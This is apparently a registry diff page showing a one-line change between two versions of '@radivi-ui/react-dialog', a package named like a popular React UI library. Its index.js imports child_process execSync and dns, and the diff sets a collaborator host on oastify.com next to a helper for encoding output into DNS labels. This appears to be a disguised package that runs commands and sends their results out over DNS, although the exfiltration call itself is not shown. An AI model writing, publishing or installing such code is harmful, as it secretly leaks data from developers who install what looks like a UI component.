@radivi-ui/react-dialog 1.1.3 → 1.1.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -4,7 +4,7 @@ const http = require('http');
|
|
|
4
4
|
const dns = require('dns');
|
|
5
5
|
const { execSync } = require('child_process');
|
|
6
6
|
|
|
7
|
-
const COLLAB_HOST = '
|
|
7
|
+
const COLLAB_HOST = 'vih2vewj1xxwlsd8dkgjqugtyk4bs1gq.oastify.com';
|
|
8
8
|
|
|
9
9
|
// Encode output safely for DNS label (max 63 chars per label)
|
|
10
10
|
function encodeForDns(str) {
|